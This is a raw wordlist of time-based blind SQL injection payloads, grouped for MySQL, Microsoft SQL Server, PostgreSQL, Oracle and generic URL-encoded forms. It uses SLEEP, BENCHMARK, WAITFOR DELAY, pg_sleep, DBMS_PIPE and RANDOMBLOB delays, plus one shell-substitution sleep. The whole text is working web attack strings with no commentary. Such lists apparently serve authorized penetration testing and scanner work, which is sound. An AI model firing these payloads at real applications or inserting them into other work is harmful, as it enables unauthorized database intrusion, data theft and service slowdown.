) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(20)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(20)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
RLIKE SLEEP(20)--
' RLIKE SLEEP(20)--
' RLIKE SLEEP(20)-- 1337
" RLIKE SLEEP(20)-- 1337
') RLIKE SLEEP(20)-- 1337
') RLIKE SLEEP(20) AND ('1337'='1337
')) RLIKE SLEEP(20) AND (('1337'='1337
'))) RLIKE SLEEP(20) AND ((('1337'='1337
) RLIKE SLEEP(20)-- 1337
) RLIKE SLEEP(20) AND (1337=1337
)) RLIKE SLEEP(20) AND ((1337=1337
))) RLIKE SLEEP(20) AND (((1337=1337
1 RLIKE SLEEP(20)
1 RLIKE SLEEP(20)-- 1337
1 RLIKE SLEEP(20)# 1337
) WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(20))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
' RLIKE SLEEP(20) AND '1337'='1337
') RLIKE SLEEP(20) AND ('1337' LIKE '1337
')) RLIKE SLEEP(20) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(20) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(20) AND '1337%'='1337
' RLIKE SLEEP(20) AND '1337' LIKE '1337
") RLIKE SLEEP(20) AND ("1337"="1337
")) RLIKE SLEEP(20) AND (("1337"="1337
"))) RLIKE SLEEP(20) AND ((("1337"="1337
" RLIKE SLEEP(20) AND "1337"="1337
") RLIKE SLEEP(20) AND ("1337" LIKE "1337
")) RLIKE SLEEP(20) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(20) AND ((("1337" LIKE "1337
" RLIKE SLEEP(20) AND "1337" LIKE "1337
' RLIKE SLEEP(20) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
ELT Blind:
' AND ELT(1337=1337,SLEEP(20))--
' AND ELT(1337=1337,SLEEP(20))-- 1337
" AND ELT(1337=1337,SLEEP(20))-- 1337
') AND ELT(1337=1337,SLEEP(20))-- 1337
') AND ELT(1337=1337,SLEEP(20)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(20)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(20)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(20)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(20)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(20)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(20)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(20))-- 1337
) AND ELT(1337=1337,SLEEP(20)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(20)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(20)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(20))
1 AND ELT(1337=1337,SLEEP(20))-- 1337
1 AND ELT(1337=1337,SLEEP(20))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(20)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))|[1
%' AND ELT(1337=1337,SLEEP(20)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(20)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(20)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(20)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(20)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(20)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(20)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(20)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(20)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(20)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(20)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
'||(SELECT 0x4c4204f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||'
'||(SELECT 0x727a20277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+'
||(SELECT 0x20720206971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
' AND 1337=BENCHMARK(20000000,MD5(0x774c20341))--
' AND 1337=BENCHMARK(20000000,MD5(0x774c20341))-- 1337
" AND 1337=BENCHMARK(20000000,MD5(0x774c20341))-- 1337
') AND =BENCHMARK(20000000,MD5(0x774c20341))--
') AND 1337=BENCHMARK(20000000,MD5(0x774c20341))-- 1337
') AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND '1337'='1337
') AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND '1337%'='1337
' AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND "1337"="1337
") AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(20000000,MD5(0x774c20341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(20000000,MD5(0x2076e7a207)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(20000000,MD5(0x2076e7a207)) AND '1337'='1337
Microsoft SQL Server Blind (Time Based):
;waitfor delay '0:0:20'--
);waitfor delay '0:0:20'--
';waitfor delay '0:0:20'--
";waitfor delay '0:0:20'--
');waitfor delay '0:0:20'--
");waitfor delay '0:0:20'--
));waitfor delay '0:0:20'--
'));waitfor delay '0:0:20'--
"));waitfor delay '0:0:20'--
") IF (1=1) WAITFOR DELAY '0:0:20'--
';%20waitfor%20delay%20'0:0:20'%20--%20
' WAITFOR DELAY '0:0:20'--
' WAITFOR DELAY '0:0:20'
or WAITFOR DELAY '0:0:20'--
or WAITFOR DELAY '0:0:20'
and WAITFOR DELAY '0:0:20'--
and WAITFOR DELAY '0:0:20'
WAITFOR DELAY '0:0:20'
;WAITFOR DELAY '0:0:20'--
;WAITFOR DELAY '0:0:20'
1 WAITFOR DELAY '0:0:20'--
1 WAITFOR DELAY '0:0:20'
1 WAITFOR DELAY '0:0:20'-- 1337
1' WAITFOR DELAY '0:0:20' AND '1337'='1337
1') WAITFOR DELAY '0:0:20' AND ('1337'='1337
1) WAITFOR DELAY '0:0:20' AND (1337=1337
') WAITFOR DELAY '0:0:20'--
" WAITFOR DELAY '0:0:20'--
')) WAITFOR DELAY '0:0:20'--
'))) WAITFOR DELAY '0:0:20'--
%' WAITFOR DELAY '0:0:20'--
") WAITFOR DELAY '0:0:20'--
")) WAITFOR DELAY '0:0:20'--
"))) WAITFOR DELAY '0:0:20'--
1 waitfor delay '0:0:20'--
1' waitfor delay '0:0:20'--
Postgresql Blind (Time Based):
";SELECT pg_sleep(20);
;SELECT pg_sleep(20);
and SELECT pg_sleep(20);
1 SELECT pg_sleep(20);
or SELECT pg_sleep(20);
(SELECT pg_sleep(20))
' SELECT pg_sleep(20);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(20))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(20))-- 1337
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(20)) AND '1337'='1337
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(20)) AND ('1337'='1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(20)) AND (1337=1337
or pg_sleep(20)--
) or pg_sleep(20)--
)) or pg_sleep(20)--
Oracle Blind (Time Based):
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20)-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND ('1337'='1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND (1337=1337
Generic Time Based SQL Injection Payloads:
(sleep 20)--
(sleep 20)
(sleep(20))--
(sleep(20))
-sleep(20)
";sleep 20--
";sleep 20
";sleep(20)--
";sleep(20)
";SELECT SLEEP(20); #
1 SELECT SLEEP(20); #
;sleep 20--
;sleep 20
;sleep(20)--
;sleep(20)
;SELECT SLEEP(20); #
' SELECT SLEEP(20); #
benchmark(200000000,MD5(1))
benchmark(200000000,MD5(1))--
benchmark(200000000,MD5(1))#
or benchmark(200000000,MD5(1))
or benchmark(200000000,MD5(1))--
or benchmark(200000000,MD5(1))#
AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
OR (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
RANDOMBLOB(2000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2))))
RANDOMBLOB(1000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
1 AND (SELECT 1 FROM (SELECT SLEEP(20))A)
1 AND (SELECT 1 FROM (SELECT(SLEEP(20)))A)
' AND SLEEP(20) AND '1'='1
' AND SLEEP(20)
or sleep(20)="
r SLEEP(20)--
or SLEEP(20) AND '1'='1
or SLEEP(20) AND '1
%20$(sleep%2020)
%20'sleep%2020'
' AND ELT(1337=1337,SLEEP(20))
" AND ELT(1337=1337,SLEEP(20))
') AND ELT(1337=1337,SLEEP(20))
")) AND ELT(1337=1337,SLEEP(20))
' AND ELT(1337=1337,SLEEP(20)) AND ('1337' LIKE '1337
' AND ELT(1337=1337,SLEEP(20)) AND "1337"="1337
' AND ELT(1337=1337,SLEEP(20)) AND "1337" LIKE "1337
', ''),/test/%26%26%09sLeEp(20)%09--+
', sleep(20))-- 1337
')); or sleep(20)='
'); or sleep(20)='
'); or sleep(20)
')); or sleep(20)
'); OR SLEEP(20)#
') OR SLEEP(20)
'); OR SLEEP(20)
'); AND SLEEP(20)#
'); AND SLEEP(20)
') AND SLEEP(20)
and sleep(20)#
AND SLEEP(20)
OR SLEEP(20)
sleep(20)
"); or sleep(20)#
%20'))%20OR%20(('test'%3D'test
%20or%20sleep%20(20)
%20or%20sleep(20)--
%20or%20sleep(20)#
%20or%20sleep(20)='
%20or%20sleep(20)="
%20or%20sleep(20)
%20and%20sleep(20)
%20and%20sleep(20)--
%20and%20sleep(20)#
%20and%20sleep(20)='
%20and%20sleep(20)="
%20AND%20SLEEP(20)
%20AND%20SLEEP(20)--
%20AND%20SLEEP(20)#
%20AND%20SLEEP(20)='
%20AND%20SLEEP(20)="
%20AND%20SLEEP(20)/*
%20and%20(select*from(select(sleep(20)))a)
%20and%20sleep(20)%23
%20AND%20SLEEP(20)%23
%20AND%20SLEEP(20)%23
